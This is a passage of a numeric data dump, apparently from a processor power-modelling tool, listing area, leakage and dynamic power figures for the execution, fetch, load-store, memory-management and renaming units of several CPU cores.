'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0740694,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0505527,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.13752,
'Execution Unit/Register Files/Runtime Dynamic': 0.0573882,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.196646,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.52332,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 1.94177,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000460515,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000460515,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000398547,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000152883,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000726193,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00204577,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00450687,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0485976,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.09123,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.13364,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.165059,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.46206,
'Instruction Fetch Unit/Runtime Dynamic': 0.35385,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.105913,
'L2/Runtime Dynamic': 0.029468,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.17194,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.980098,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.062596,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0625961,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.46873,
'Load Store Unit/Runtime Dynamic': 1.3514,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.154351,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.308703,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0547797,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0563481,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.192201,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0219751,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.445403,
'Memory Management Unit/Runtime Dynamic': 0.0783231,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 19.7794,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.221364,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0123057,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0948945,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.328564,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 4.08337,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0264891,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.223494,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.136566,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.0663464,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.107014,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.0540172,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.227378,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.054944,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.17456,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0258003,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00278287,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0303044,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.020581,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0561047,
'Execution Unit/Register Files/Runtime Dynamic': 0.0233639,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.0704667,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.187539,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.06715,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000190311,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000190311,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000166083,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 6.44697e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000295648,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.000842353,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00181317,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0197851,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 1.2585,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.0536059,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.0671989,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 3.53809,
'Instruction Fetch Unit/Runtime Dynamic': 0.143245,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0437782,
'L2/Runtime Dynamic': 0.0122258,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.03053,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.401989,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0256686,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0256687,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.15174,
'Load Store Unit/Runtime Dynamic': 0.554247,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0632944,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.126589,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0224634,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0231115,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.078249,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.00881622,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.272946,
'Memory Management Unit/Runtime Dynamic': 0.0319277,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 13.7706,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0678693,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00381932,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0328129,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.104502,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 1.9133,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.026525,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.223522,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.134947,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.0653442,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.105398,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.0532012,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.223943,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.0540457,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.17099,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0254944,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00274083,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
